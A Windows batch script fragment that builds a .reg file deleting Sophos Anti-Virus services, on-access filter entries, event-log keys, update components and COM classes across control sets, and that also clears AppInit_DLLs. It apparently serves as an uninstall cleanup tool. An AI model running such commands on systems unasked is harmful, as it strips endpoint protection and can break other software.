ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SOPHOS_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAVSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_SERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SOPHOS_MESSAGE_ROUTER] >> %TEMP%\SOTMP.REG
REM === Sophos Event Log Registration Current ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\SophosAntiVirus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\Sophos Anti-Virus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
REM === Sophos Services Current ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVAdminService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlControlSet\Services\SAVOnAccess] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos AutoUpdate Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos AutoUpdate Service] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\SophosBootDriver] >> %TEMP%\SOTMP.REG
REM === Sophos 4.x Removal ===
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %TEMP%\SOTMP.REG
echo "Sweep95"=%nulvar% >> %TEMP%\SOTMP.REG
echo "InterCheckMonitor"=%nulvar% >> %TEMP%\SOTMP.REG
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices] >> %TEMP%\SOTMP.REG
echo "Sweep95"=%nulvar% >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VxD\Sophos ICSTATIC] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Sophos-Sweep95] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sophos-SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_CURRENT_USER\Software\Sophos\SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_USERS\.DEFAULT\Software\Sophos\SweepNT] >> %TEMP%\SOTMP.REG
REM === CurrentControlSet ===
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_CONTROL] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_FILTER] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MEMSWEEP] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SWEEPUPDATE] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SWEEPUPDATE] >> %TEMP%\SOTMP.REG
REM === ControlSet001 ===
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_CONTROL] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_FILTER] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MEMSWEEP] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SWEEPUPDATE] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SWEEPUPDATE] >> %TEMP%\SOTMP.REG
REM === ControlSet002 ===
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\Application\SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_CONTROL] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_FILTER] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MEMSWEEP] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SWEEPUPDATE] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SWEEPUPDATE] >> %TEMP%\SOTMP.REG
REM === Remote Update Reg Entries ===
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Remote Update] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CacheMgr] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CacheMgr] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\CacheMgr] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CACHEMGR] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CACHEMGR] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_CACHEMGR] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Remote Update] >> %TEMP%\SOTMP.REG
REM === BOPS ===
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows] >> %TEMP%\SOTMP.REG
echo "AppInit_DLLs"=%nulvar% >> %TEMP%\SOTMP.REG
REM ==== AppInit_DLLs BACKUP ====
REGEDIT /E %temp%\AppInit_BAK.reg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\"
REM === Remove InProgress (Suspended Installers)
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Inprogress] >> %TEMP%\SOTMP.REG
REM === SAU COM Objects Removal ===
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ALUpdNotification] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ALUpdNotification.1] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ClientUpdate] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ClientUpdate.1] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ConnectionListener] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ConnectionListener.1] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\iMonitor.PropertiesDialog] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\iMonitor.PropertiesDialog.1] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\iMonitor.UpdateNotification2] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\iMonitor.UpdateNotification2.1] >> %TEMP%\SOTMP.REG
